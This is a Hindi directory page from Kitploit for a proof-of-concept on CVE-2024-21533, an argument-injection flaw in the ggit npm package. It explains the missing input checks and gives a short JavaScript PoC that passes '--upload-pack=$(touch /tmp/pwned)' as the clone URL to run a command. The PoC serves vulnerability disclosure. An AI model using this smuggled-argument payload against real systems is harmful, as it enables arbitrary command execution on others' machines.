Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-21533-PoC-ggit — CVE-2024-21533 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, ggit npm पैकेज में एक आर्गुमेंट इंजेक्शन कमजोरी जो --upload-pack Git विकल्प के माध्यम से मनमाना कमांड निष्पादन की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/lirantal/cve-2024-21533-poc-ggit
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणआपूर्ति श्रृंखला सुरक्षा
GitHublirantal/cve-2024-21533-poc-ggit

CVE-2024-21533-PoC-ggit

CVE-2024-21533 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, ggit npm पैकेज में एक आर्गुमेंट इंजेक्शन कमजोरी जो --upload-pack Git विकल्प के माध्यम से मनमाना कमांड निष्पादन की अनुमति देती है।

रिपॉजिटरी देखें
32 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ggit में CVE-2024-21533 तर्क इंजेक्शन भेद्यता

ggit स्वयं का वर्णन इस प्रकार करता है:

root@kitploit:~
Local promise-returning git command wrappers

संसाधन:

  • प्रोजेक्ट का GitHub स्रोत कोड: https://github.com/bahmutov/ggit
  • प्रोजेक्ट का npm पैकेज: https://www.npmjs.com/package/ggit

इस तर्क इंजेक्शन भेद्यता पर लेख: https://nodejs-security.com/blog/flawed-git-promises-library-on-npm-leads-to-command-injection-vulnerability

शोषण की पृष्ठभूमि

मैं ggit npm पैकेज में एक तर्क इंजेक्शन भेद्यता की रिपोर्ट कर रहा हूँ।

यह भेद्यता लाइब्रेरी के clone() API के साथ प्रकट होती है, जो क्लोन करने के लिए रिमोट URL और क्लोन करने के लिए डिस्क पर फ़ाइल निर्दिष्ट करने की अनुमति देता है। हालांकि, लाइब्रेरी उपयोगकर्ता इनपुट के लिए स्वच्छता नहीं करती है या दिए गए URL स्कीम को मान्य नहीं करती है, और न ही यह विकल्पों के अंत को संप्रेषित करने के लिए डबल-डैश POSIX वर्णों (--) का उपयोग करके बाइनरी को कमांड-लाइन फ़्लैग्स को ठीक से पास करता है।

git

इस प्रकार, उपयोगकर्ताओं को Git में --upload-pack कमांड-लाइन विकल्प के कारण एक तर्क इंजेक्शन भेद्यता का शोषण करने की अनुमति मिलती है जिसके परिणामस्वरूप मनमानी कमांड निष्पादित होती हैं। (outPath) में क्लोन करने के लिए तब भेद्यता लागू होती है।

शोषण

  1. [email protected] या पहले का संस्करण स्थापित करें
  2. निम्नलिखित POC स्थापित करें:
root@kitploit:~
const clone = require("ggit").cloneRepo;
clone({
  url: "--upload-pack=$(touch /tmp/pwned)",
  folder: "/tmp/dbd",
}).then(function () {
  console.log("cloned repo to destination folder");
});
  1. डिस्क पर /tmp/pwned पर बनाई गई नई फ़ाइल देखें

योगदान देना

कृपया इस परियोजना में योगदान करने के दिशानिर्देशों के लिए CONTRIBUTING देखें।

लेखक

Liran Tal

टूल डाउनलोड करें